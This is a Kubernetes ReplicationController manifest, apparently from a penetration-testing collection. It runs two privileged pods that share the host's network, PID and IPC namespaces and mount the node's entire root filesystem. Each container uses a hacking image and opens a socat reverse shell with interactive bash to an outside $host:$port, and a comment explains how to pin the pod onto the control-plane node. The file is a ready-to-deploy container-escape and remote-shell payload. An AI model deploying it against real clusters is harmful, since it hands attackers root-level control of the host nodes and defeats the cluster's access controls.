apiVersion: v1
kind: ReplicationController
metadata:
  name: everything-allowed-revshell-replicationcontroller
  labels:
    app: pentest
    type: replicationcontroller
spec:
  replicas: 2
  selector:
    app: pentest
    type: replicationcontroller
  template:
    metadata:
      labels:
        app: pentest
        type: replicationcontroller
    spec:
      hostNetwork: true
      hostPID: true
      hostIPC: true
      containers:
      - name: everything-allowed-revshell-replicationcontroller
        image: beserkerbob/hackingcontainerkubernetes:0.2
        command: [ "/bin/bash", "-c", "--" ]
        args: [ "socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:$host:$port"]
        securityContext:
          privileged: true
        volumeMounts:
        - mountPath: /host
          name: noderoot
      #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
      volumes:
      - name: noderoot
        hostPath:
          path: /
      